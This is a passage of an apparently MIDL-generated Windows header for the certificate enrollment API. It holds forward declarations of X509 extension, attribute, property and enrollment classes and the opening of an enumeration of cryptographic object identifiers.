typedef class CX509Extensions CX509Extensions;
#else
typedef struct CX509Extensions CX509Extensions;
#endif /* __cplusplus */

#endif 	/* __CX509Extensions_FWD_DEFINED__ */


#ifndef __CX509ExtensionKeyUsage_FWD_DEFINED__
#define __CX509ExtensionKeyUsage_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionKeyUsage CX509ExtensionKeyUsage;
#else
typedef struct CX509ExtensionKeyUsage CX509ExtensionKeyUsage;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionKeyUsage_FWD_DEFINED__ */


#ifndef __CX509ExtensionEnhancedKeyUsage_FWD_DEFINED__
#define __CX509ExtensionEnhancedKeyUsage_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionEnhancedKeyUsage CX509ExtensionEnhancedKeyUsage;
#else
typedef struct CX509ExtensionEnhancedKeyUsage CX509ExtensionEnhancedKeyUsage;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionEnhancedKeyUsage_FWD_DEFINED__ */


#ifndef __CX509ExtensionTemplateName_FWD_DEFINED__
#define __CX509ExtensionTemplateName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionTemplateName CX509ExtensionTemplateName;
#else
typedef struct CX509ExtensionTemplateName CX509ExtensionTemplateName;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionTemplateName_FWD_DEFINED__ */


#ifndef __CX509ExtensionTemplate_FWD_DEFINED__
#define __CX509ExtensionTemplate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionTemplate CX509ExtensionTemplate;
#else
typedef struct CX509ExtensionTemplate CX509ExtensionTemplate;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionTemplate_FWD_DEFINED__ */


#ifndef __CAlternativeName_FWD_DEFINED__
#define __CAlternativeName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CAlternativeName CAlternativeName;
#else
typedef struct CAlternativeName CAlternativeName;
#endif /* __cplusplus */

#endif 	/* __CAlternativeName_FWD_DEFINED__ */


#ifndef __CAlternativeNames_FWD_DEFINED__
#define __CAlternativeNames_FWD_DEFINED__

#ifdef __cplusplus
typedef class CAlternativeNames CAlternativeNames;
#else
typedef struct CAlternativeNames CAlternativeNames;
#endif /* __cplusplus */

#endif 	/* __CAlternativeNames_FWD_DEFINED__ */


#ifndef __CX509ExtensionAlternativeNames_FWD_DEFINED__
#define __CX509ExtensionAlternativeNames_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionAlternativeNames CX509ExtensionAlternativeNames;
#else
typedef struct CX509ExtensionAlternativeNames CX509ExtensionAlternativeNames;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionAlternativeNames_FWD_DEFINED__ */


#ifndef __CX509ExtensionBasicConstraints_FWD_DEFINED__
#define __CX509ExtensionBasicConstraints_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionBasicConstraints CX509ExtensionBasicConstraints;
#else
typedef struct CX509ExtensionBasicConstraints CX509ExtensionBasicConstraints;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionBasicConstraints_FWD_DEFINED__ */


#ifndef __CX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__
#define __CX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionSubjectKeyIdentifier CX509ExtensionSubjectKeyIdentifier;
#else
typedef struct CX509ExtensionSubjectKeyIdentifier CX509ExtensionSubjectKeyIdentifier;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__ */


#ifndef __CX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__
#define __CX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionAuthorityKeyIdentifier CX509ExtensionAuthorityKeyIdentifier;
#else
typedef struct CX509ExtensionAuthorityKeyIdentifier CX509ExtensionAuthorityKeyIdentifier;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__ */


#ifndef __CSmimeCapability_FWD_DEFINED__
#define __CSmimeCapability_FWD_DEFINED__

#ifdef __cplusplus
typedef class CSmimeCapability CSmimeCapability;
#else
typedef struct CSmimeCapability CSmimeCapability;
#endif /* __cplusplus */

#endif 	/* __CSmimeCapability_FWD_DEFINED__ */


#ifndef __CSmimeCapabilities_FWD_DEFINED__
#define __CSmimeCapabilities_FWD_DEFINED__

#ifdef __cplusplus
typedef class CSmimeCapabilities CSmimeCapabilities;
#else
typedef struct CSmimeCapabilities CSmimeCapabilities;
#endif /* __cplusplus */

#endif 	/* __CSmimeCapabilities_FWD_DEFINED__ */


#ifndef __CX509ExtensionSmimeCapabilities_FWD_DEFINED__
#define __CX509ExtensionSmimeCapabilities_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionSmimeCapabilities CX509ExtensionSmimeCapabilities;
#else
typedef struct CX509ExtensionSmimeCapabilities CX509ExtensionSmimeCapabilities;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionSmimeCapabilities_FWD_DEFINED__ */


#ifndef __CPolicyQualifier_FWD_DEFINED__
#define __CPolicyQualifier_FWD_DEFINED__

#ifdef __cplusplus
typedef class CPolicyQualifier CPolicyQualifier;
#else
typedef struct CPolicyQualifier CPolicyQualifier;
#endif /* __cplusplus */

#endif 	/* __CPolicyQualifier_FWD_DEFINED__ */


#ifndef __CPolicyQualifiers_FWD_DEFINED__
#define __CPolicyQualifiers_FWD_DEFINED__

#ifdef __cplusplus
typedef class CPolicyQualifiers CPolicyQualifiers;
#else
typedef struct CPolicyQualifiers CPolicyQualifiers;
#endif /* __cplusplus */

#endif 	/* __CPolicyQualifiers_FWD_DEFINED__ */


#ifndef __CCertificatePolicy_FWD_DEFINED__
#define __CCertificatePolicy_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertificatePolicy CCertificatePolicy;
#else
typedef struct CCertificatePolicy CCertificatePolicy;
#endif /* __cplusplus */

#endif 	/* __CCertificatePolicy_FWD_DEFINED__ */


#ifndef __CCertificatePolicies_FWD_DEFINED__
#define __CCertificatePolicies_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertificatePolicies CCertificatePolicies;
#else
typedef struct CCertificatePolicies CCertificatePolicies;
#endif /* __cplusplus */

#endif 	/* __CCertificatePolicies_FWD_DEFINED__ */


#ifndef __CX509ExtensionCertificatePolicies_FWD_DEFINED__
#define __CX509ExtensionCertificatePolicies_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionCertificatePolicies CX509ExtensionCertificatePolicies;
#else
typedef struct CX509ExtensionCertificatePolicies CX509ExtensionCertificatePolicies;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionCertificatePolicies_FWD_DEFINED__ */


#ifndef __CX509ExtensionMSApplicationPolicies_FWD_DEFINED__
#define __CX509ExtensionMSApplicationPolicies_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509ExtensionMSApplicationPolicies CX509ExtensionMSApplicationPolicies;
#else
typedef struct CX509ExtensionMSApplicationPolicies CX509ExtensionMSApplicationPolicies;
#endif /* __cplusplus */

#endif 	/* __CX509ExtensionMSApplicationPolicies_FWD_DEFINED__ */


#ifndef __CX509Attribute_FWD_DEFINED__
#define __CX509Attribute_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Attribute CX509Attribute;
#else
typedef struct CX509Attribute CX509Attribute;
#endif /* __cplusplus */

#endif 	/* __CX509Attribute_FWD_DEFINED__ */


#ifndef __CX509Attributes_FWD_DEFINED__
#define __CX509Attributes_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Attributes CX509Attributes;
#else
typedef struct CX509Attributes CX509Attributes;
#endif /* __cplusplus */

#endif 	/* __CX509Attributes_FWD_DEFINED__ */


#ifndef __CX509AttributeExtensions_FWD_DEFINED__
#define __CX509AttributeExtensions_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeExtensions CX509AttributeExtensions;
#else
typedef struct CX509AttributeExtensions CX509AttributeExtensions;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeExtensions_FWD_DEFINED__ */


#ifndef __CX509AttributeClientId_FWD_DEFINED__
#define __CX509AttributeClientId_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeClientId CX509AttributeClientId;
#else
typedef struct CX509AttributeClientId CX509AttributeClientId;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeClientId_FWD_DEFINED__ */


#ifndef __CX509AttributeRenewalCertificate_FWD_DEFINED__
#define __CX509AttributeRenewalCertificate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeRenewalCertificate CX509AttributeRenewalCertificate;
#else
typedef struct CX509AttributeRenewalCertificate CX509AttributeRenewalCertificate;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeRenewalCertificate_FWD_DEFINED__ */


#ifndef __CX509AttributeArchiveKey_FWD_DEFINED__
#define __CX509AttributeArchiveKey_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeArchiveKey CX509AttributeArchiveKey;
#else
typedef struct CX509AttributeArchiveKey CX509AttributeArchiveKey;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeArchiveKey_FWD_DEFINED__ */


#ifndef __CX509AttributeArchiveKeyHash_FWD_DEFINED__
#define __CX509AttributeArchiveKeyHash_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeArchiveKeyHash CX509AttributeArchiveKeyHash;
#else
typedef struct CX509AttributeArchiveKeyHash CX509AttributeArchiveKeyHash;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeArchiveKeyHash_FWD_DEFINED__ */


#ifndef __CX509AttributeOSVersion_FWD_DEFINED__
#define __CX509AttributeOSVersion_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeOSVersion CX509AttributeOSVersion;
#else
typedef struct CX509AttributeOSVersion CX509AttributeOSVersion;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeOSVersion_FWD_DEFINED__ */


#ifndef __CX509AttributeCspProvider_FWD_DEFINED__
#define __CX509AttributeCspProvider_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509AttributeCspProvider CX509AttributeCspProvider;
#else
typedef struct CX509AttributeCspProvider CX509AttributeCspProvider;
#endif /* __cplusplus */

#endif 	/* __CX509AttributeCspProvider_FWD_DEFINED__ */


#ifndef __CCryptAttribute_FWD_DEFINED__
#define __CCryptAttribute_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCryptAttribute CCryptAttribute;
#else
typedef struct CCryptAttribute CCryptAttribute;
#endif /* __cplusplus */

#endif 	/* __CCryptAttribute_FWD_DEFINED__ */


#ifndef __CCryptAttributes_FWD_DEFINED__
#define __CCryptAttributes_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCryptAttributes CCryptAttributes;
#else
typedef struct CCryptAttributes CCryptAttributes;
#endif /* __cplusplus */

#endif 	/* __CCryptAttributes_FWD_DEFINED__ */


#ifndef __CCertProperty_FWD_DEFINED__
#define __CCertProperty_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertProperty CCertProperty;
#else
typedef struct CCertProperty CCertProperty;
#endif /* __cplusplus */

#endif 	/* __CCertProperty_FWD_DEFINED__ */


#ifndef __CCertProperties_FWD_DEFINED__
#define __CCertProperties_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertProperties CCertProperties;
#else
typedef struct CCertProperties CCertProperties;
#endif /* __cplusplus */

#endif 	/* __CCertProperties_FWD_DEFINED__ */


#ifndef __CCertPropertyFriendlyName_FWD_DEFINED__
#define __CCertPropertyFriendlyName_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyFriendlyName CCertPropertyFriendlyName;
#else
typedef struct CCertPropertyFriendlyName CCertPropertyFriendlyName;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyFriendlyName_FWD_DEFINED__ */


#ifndef __CCertPropertyDescription_FWD_DEFINED__
#define __CCertPropertyDescription_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyDescription CCertPropertyDescription;
#else
typedef struct CCertPropertyDescription CCertPropertyDescription;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyDescription_FWD_DEFINED__ */


#ifndef __CCertPropertyAutoEnroll_FWD_DEFINED__
#define __CCertPropertyAutoEnroll_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyAutoEnroll CCertPropertyAutoEnroll;
#else
typedef struct CCertPropertyAutoEnroll CCertPropertyAutoEnroll;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyAutoEnroll_FWD_DEFINED__ */


#ifndef __CCertPropertyRequestOriginator_FWD_DEFINED__
#define __CCertPropertyRequestOriginator_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyRequestOriginator CCertPropertyRequestOriginator;
#else
typedef struct CCertPropertyRequestOriginator CCertPropertyRequestOriginator;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyRequestOriginator_FWD_DEFINED__ */


#ifndef __CCertPropertySHA1Hash_FWD_DEFINED__
#define __CCertPropertySHA1Hash_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertySHA1Hash CCertPropertySHA1Hash;
#else
typedef struct CCertPropertySHA1Hash CCertPropertySHA1Hash;
#endif /* __cplusplus */

#endif 	/* __CCertPropertySHA1Hash_FWD_DEFINED__ */


#ifndef __CCertPropertyKeyProvInfo_FWD_DEFINED__
#define __CCertPropertyKeyProvInfo_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyKeyProvInfo CCertPropertyKeyProvInfo;
#else
typedef struct CCertPropertyKeyProvInfo CCertPropertyKeyProvInfo;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyKeyProvInfo_FWD_DEFINED__ */


#ifndef __CCertPropertyArchived_FWD_DEFINED__
#define __CCertPropertyArchived_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyArchived CCertPropertyArchived;
#else
typedef struct CCertPropertyArchived CCertPropertyArchived;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyArchived_FWD_DEFINED__ */


#ifndef __CCertPropertyBackedUp_FWD_DEFINED__
#define __CCertPropertyBackedUp_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyBackedUp CCertPropertyBackedUp;
#else
typedef struct CCertPropertyBackedUp CCertPropertyBackedUp;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyBackedUp_FWD_DEFINED__ */


#ifndef __CCertPropertyEnrollment_FWD_DEFINED__
#define __CCertPropertyEnrollment_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyEnrollment CCertPropertyEnrollment;
#else
typedef struct CCertPropertyEnrollment CCertPropertyEnrollment;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyEnrollment_FWD_DEFINED__ */


#ifndef __CCertPropertyRenewal_FWD_DEFINED__
#define __CCertPropertyRenewal_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyRenewal CCertPropertyRenewal;
#else
typedef struct CCertPropertyRenewal CCertPropertyRenewal;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyRenewal_FWD_DEFINED__ */


#ifndef __CCertPropertyArchivedKeyHash_FWD_DEFINED__
#define __CCertPropertyArchivedKeyHash_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyArchivedKeyHash CCertPropertyArchivedKeyHash;
#else
typedef struct CCertPropertyArchivedKeyHash CCertPropertyArchivedKeyHash;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyArchivedKeyHash_FWD_DEFINED__ */


#ifndef __CCertPropertyEnrollmentPolicyServer_FWD_DEFINED__
#define __CCertPropertyEnrollmentPolicyServer_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyEnrollmentPolicyServer CCertPropertyEnrollmentPolicyServer;
#else
typedef struct CCertPropertyEnrollmentPolicyServer CCertPropertyEnrollmentPolicyServer;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyEnrollmentPolicyServer_FWD_DEFINED__ */


#ifndef __CSignerCertificate_FWD_DEFINED__
#define __CSignerCertificate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CSignerCertificate CSignerCertificate;
#else
typedef struct CSignerCertificate CSignerCertificate;
#endif /* __cplusplus */

#endif 	/* __CSignerCertificate_FWD_DEFINED__ */


#ifndef __CX509NameValuePair_FWD_DEFINED__
#define __CX509NameValuePair_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509NameValuePair CX509NameValuePair;
#else
typedef struct CX509NameValuePair CX509NameValuePair;
#endif /* __cplusplus */

#endif 	/* __CX509NameValuePair_FWD_DEFINED__ */


#ifndef __CCertificateAttestationChallenge_FWD_DEFINED__
#define __CCertificateAttestationChallenge_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertificateAttestationChallenge CCertificateAttestationChallenge;
#else
typedef struct CCertificateAttestationChallenge CCertificateAttestationChallenge;
#endif /* __cplusplus */

#endif 	/* __CCertificateAttestationChallenge_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestPkcs10_FWD_DEFINED__
#define __CX509CertificateRequestPkcs10_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestPkcs10 CX509CertificateRequestPkcs10;
#else
typedef struct CX509CertificateRequestPkcs10 CX509CertificateRequestPkcs10;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestPkcs10_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestCertificate_FWD_DEFINED__
#define __CX509CertificateRequestCertificate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestCertificate CX509CertificateRequestCertificate;
#else
typedef struct CX509CertificateRequestCertificate CX509CertificateRequestCertificate;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestCertificate_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestPkcs7_FWD_DEFINED__
#define __CX509CertificateRequestPkcs7_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestPkcs7 CX509CertificateRequestPkcs7;
#else
typedef struct CX509CertificateRequestPkcs7 CX509CertificateRequestPkcs7;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestPkcs7_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestCmc_FWD_DEFINED__
#define __CX509CertificateRequestCmc_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestCmc CX509CertificateRequestCmc;
#else
typedef struct CX509CertificateRequestCmc CX509CertificateRequestCmc;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestCmc_FWD_DEFINED__ */


#ifndef __CX509Enrollment_FWD_DEFINED__
#define __CX509Enrollment_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Enrollment CX509Enrollment;
#else
typedef struct CX509Enrollment CX509Enrollment;
#endif /* __cplusplus */

#endif 	/* __CX509Enrollment_FWD_DEFINED__ */


#ifndef __CX509EnrollmentWebClassFactory_FWD_DEFINED__
#define __CX509EnrollmentWebClassFactory_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentWebClassFactory CX509EnrollmentWebClassFactory;
#else
typedef struct CX509EnrollmentWebClassFactory CX509EnrollmentWebClassFactory;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentWebClassFactory_FWD_DEFINED__ */


#ifndef __CX509EnrollmentHelper_FWD_DEFINED__
#define __CX509EnrollmentHelper_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentHelper CX509EnrollmentHelper;
#else
typedef struct CX509EnrollmentHelper CX509EnrollmentHelper;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentHelper_FWD_DEFINED__ */


#ifndef __CX509MachineEnrollmentFactory_FWD_DEFINED__
#define __CX509MachineEnrollmentFactory_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509MachineEnrollmentFactory CX509MachineEnrollmentFactory;
#else
typedef struct CX509MachineEnrollmentFactory CX509MachineEnrollmentFactory;
#endif /* __cplusplus */

#endif 	/* __CX509MachineEnrollmentFactory_FWD_DEFINED__ */


#ifndef __CX509EnrollmentPolicyActiveDirectory_FWD_DEFINED__
#define __CX509EnrollmentPolicyActiveDirectory_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentPolicyActiveDirectory CX509EnrollmentPolicyActiveDirectory;
#else
typedef struct CX509EnrollmentPolicyActiveDirectory CX509EnrollmentPolicyActiveDirectory;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentPolicyActiveDirectory_FWD_DEFINED__ */


#ifndef __CX509EnrollmentPolicyWebService_FWD_DEFINED__
#define __CX509EnrollmentPolicyWebService_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentPolicyWebService CX509EnrollmentPolicyWebService;
#else
typedef struct CX509EnrollmentPolicyWebService CX509EnrollmentPolicyWebService;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentPolicyWebService_FWD_DEFINED__ */


#ifndef __CX509PolicyServerListManager_FWD_DEFINED__
#define __CX509PolicyServerListManager_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PolicyServerListManager CX509PolicyServerListManager;
#else
typedef struct CX509PolicyServerListManager CX509PolicyServerListManager;
#endif /* __cplusplus */

#endif 	/* __CX509PolicyServerListManager_FWD_DEFINED__ */


#ifndef __CX509PolicyServerUrl_FWD_DEFINED__
#define __CX509PolicyServerUrl_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PolicyServerUrl CX509PolicyServerUrl;
#else
typedef struct CX509PolicyServerUrl CX509PolicyServerUrl;
#endif /* __cplusplus */

#endif 	/* __CX509PolicyServerUrl_FWD_DEFINED__ */


#ifndef __CX509CertificateTemplateADWritable_FWD_DEFINED__
#define __CX509CertificateTemplateADWritable_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateTemplateADWritable CX509CertificateTemplateADWritable;
#else
typedef struct CX509CertificateTemplateADWritable CX509CertificateTemplateADWritable;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateTemplateADWritable_FWD_DEFINED__ */


#ifndef __CX509CertificateRevocationListEntry_FWD_DEFINED__
#define __CX509CertificateRevocationListEntry_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRevocationListEntry CX509CertificateRevocationListEntry;
#else
typedef struct CX509CertificateRevocationListEntry CX509CertificateRevocationListEntry;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRevocationListEntry_FWD_DEFINED__ */


#ifndef __CX509CertificateRevocationListEntries_FWD_DEFINED__
#define __CX509CertificateRevocationListEntries_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRevocationListEntries CX509CertificateRevocationListEntries;
#else
typedef struct CX509CertificateRevocationListEntries CX509CertificateRevocationListEntries;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRevocationListEntries_FWD_DEFINED__ */


#ifndef __CX509CertificateRevocationList_FWD_DEFINED__
#define __CX509CertificateRevocationList_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRevocationList CX509CertificateRevocationList;
#else
typedef struct CX509CertificateRevocationList CX509CertificateRevocationList;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRevocationList_FWD_DEFINED__ */


#ifndef __CX509SCEPEnrollment_FWD_DEFINED__
#define __CX509SCEPEnrollment_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509SCEPEnrollment CX509SCEPEnrollment;
#else
typedef struct CX509SCEPEnrollment CX509SCEPEnrollment;
#endif /* __cplusplus */

#endif 	/* __CX509SCEPEnrollment_FWD_DEFINED__ */


#ifndef __CX509SCEPEnrollmentHelper_FWD_DEFINED__
#define __CX509SCEPEnrollmentHelper_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509SCEPEnrollmentHelper CX509SCEPEnrollmentHelper;
#else
typedef struct CX509SCEPEnrollmentHelper CX509SCEPEnrollmentHelper;
#endif /* __cplusplus */

#endif 	/* __CX509SCEPEnrollmentHelper_FWD_DEFINED__ */


/* header files for imported files */
#include "wtypes.h"
#include "oaidl.h"
#include "certcli.h"
#include "certpol.h"

#ifdef __cplusplus
extern "C"{
#endif 


/* interface __MIDL_itf_certenroll_0000_0000 */
/* [local] */ 

#include <winapifamily.h>
#pragma region Desktop Family
#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
#if defined(MIDL_PASS)
typedef typedef void VOID;
;

#endif
typedef 
enum CERTENROLL_OBJECTID
    {
        XCN_OID_NONE	= 0,
        XCN_OID_RSA	= 1,
        XCN_OID_PKCS	= 2,
        XCN_OID_RSA_HASH	= 3,
        XCN_OID_RSA_ENCRYPT	= 4,
        XCN_OID_PKCS_1	= 5,
        XCN_OID_PKCS_2	= 6,
        XCN_OID_PKCS_3	= 7,
        XCN_OID_PKCS_4	= 8,
        XCN_OID_PKCS_5	= 9,
        XCN_OID_PKCS_6	= 10,
        XCN_OID_PKCS_7	= 11,
        XCN_OID_PKCS_8	= 12,
        XCN_OID_PKCS_9	= 13,
        XCN_OID_PKCS_10	= 14,
        XCN_OID_PKCS_12	= 15,
        XCN_OID_RSA_RSA	= 16,
        XCN_OID_RSA_MD2RSA	= 17,
        XCN_OID_RSA_MD4RSA	= 18,
        XCN_OID_RSA_MD5RSA	= 19,
        XCN_OID_RSA_SHA1RSA	= 20,
        XCN_OID_RSA_SETOAEP_RSA	= 21,
        XCN_OID_RSA_DH	= 22,
        XCN_OID_RSA_data	= 23,
        XCN_OID_RSA_signedData	= 24,
        XCN_OID_RSA_envelopedData	= 25,
        XCN_OID_RSA_signEnvData	= 26,
        XCN_OID_RSA_digestedData	= 27,
        XCN_OID_RSA_hashedData	= 28,
        XCN_OID_RSA_encryptedData	= 29,
        XCN_OID_RSA_emailAddr	= 30,
        XCN_OID_RSA_unstructName	= 31,
        XCN_OID_RSA_contentType	= 32,
        XCN_OID_RSA_messageDigest	= 33,
        XCN_OID_RSA_signingTime	= 34,
        XCN_OID_RSA_counterSign	= 35,
        XCN_OID_RSA_challengePwd	= 36,
        XCN_OID_RSA_unstructAddr	= 37,
        XCN_OID_RSA_extCertAttrs	= 38,
        XCN_OID_RSA_certExtensions	= 39,
        XCN_OID_RSA_SMIMECapabilities	= 40,
        XCN_OID_RSA_preferSignedData	= 41,
        XCN_OID_RSA_SMIMEalg	= 42,
        XCN_OID_RSA_SMIMEalgESDH	= 43,
        XCN_OID_RSA_SMIMEalgCMS3DESwrap	= 44,
        XCN_OID_RSA_SMIMEalgCMSRC2wrap	= 45,
        XCN_OID_RSA_MD2	= 46,
        XCN_OID_RSA_MD4	= 47,
        XCN_OID_RSA_MD5	= 48,
        XCN_OID_RSA_RC2CBC	= 49,
        XCN_OID_RSA_RC4	= 50,
        XCN_OID_RSA_DES_EDE3_CBC	= 51,
        XCN_OID_RSA_RC5_CBCPad	= 52,
        XCN_OID_ANSI_X942	= 53,
        XCN_OID_ANSI_X942_DH	= 54,
        XCN_OID_X957	= 55,
        XCN_OID_X957_DSA	= 56,
        XCN_OID_X957_SHA1DSA	= 57,
        XCN_OID_DS	= 58,
        XCN_OID_DSALG	= 59,
        XCN_OID_DSALG_CRPT	= 60,
        XCN_OID_DSALG_HASH	= 61,
        XCN_OID_DSALG_SIGN	= 62,
        XCN_OID_DSALG_RSA	= 63,
        XCN_OID_OIW	= 64,
        XCN_OID_OIWSEC	= 65,
        XCN_OID_OIWSEC_md4RSA	= 66,
        XCN_OID_OIWSEC_md5RSA	= 67,
        XCN_OID_OIWSEC_md4RSA2	= 68,
        XCN_OID_OIWSEC_desECB	= 69,
        XCN_OID_OIWSEC_desCBC	= 70,
        XCN_OID_OIWSEC_desOFB	= 71,
        XCN_OID_OIWSEC_desCFB	= 72,
        XCN_OID_OIWSEC_desMAC	= 73,
        XCN_OID_OIWSEC_rsaSign	= 74,
        XCN_OID_OIWSEC_dsa	= 75,
        XCN_OID_OIWSEC_shaDSA	= 76,
        XCN_OID_OIWSEC_mdc2RSA	= 77,
        XCN_OID_OIWSEC_shaRSA	= 78,
        XCN_OID_OIWSEC_dhCommMod	= 79,
        XCN_OID_OIWSEC_desEDE	= 80,
        XCN_OID_OIWSEC_sha	= 81,
        XCN_OID_OIWSEC_mdc2	= 82,
        XCN_OID_OIWSEC_dsaComm	= 83,
        XCN_OID_OIWSEC_dsaCommSHA	= 84,
        XCN_OID_OIWSEC_rsaXchg	= 85,
        XCN_OID_OIWSEC_keyHashSeal	= 86,
        XCN_OID_OIWSEC_md2RSASign	= 87,
        XCN_OID_OIWSEC_md5RSASign	= 88,
        XCN_OID_OIWSEC_sha1	= 89,
        XCN_OID_OIWSEC_dsaSHA1	= 90,
        XCN_OID_OIWSEC_dsaCommSHA1	= 91,
        XCN_OID_OIWSEC_sha1RSASign	= 92,
        XCN_OID_OIWDIR	= 93,
        XCN_OID_OIWDIR_CRPT	= 94,
        XCN_OID_OIWDIR_HASH	= 95,
        XCN_OID_OIWDIR_SIGN	= 96,
        XCN_OID_OIWDIR_md2	= 97,
        XCN_OID_OIWDIR_md2RSA	= 98,
        XCN_OID_INFOSEC	= 99,
        XCN_OID_INFOSEC_sdnsSignature	= 100,
        XCN_OID_INFOSEC_mosaicSignature	= 101,
        XCN_OID_INFOSEC_sdnsConfidentiality	= 102,
        XCN_OID_INFOSEC_mosaicConfidentiality	= 103,
        XCN_OID_INFOSEC_sdnsIntegrity	= 104,
        XCN_OID_INFOSEC_mosaicIntegrity	= 105,
        XCN_OID_INFOSEC_sdnsTokenProtection	= 106,
        XCN_OID_INFOSEC_mosaicTokenProtection	= 107,
        XCN_OID_INFOSEC_sdnsKeyManagement	= 108,
        XCN_OID_INFOSEC_mosaicKeyManagement	= 109,
        XCN_OID_INFOSEC_sdnsKMandSig	= 110,
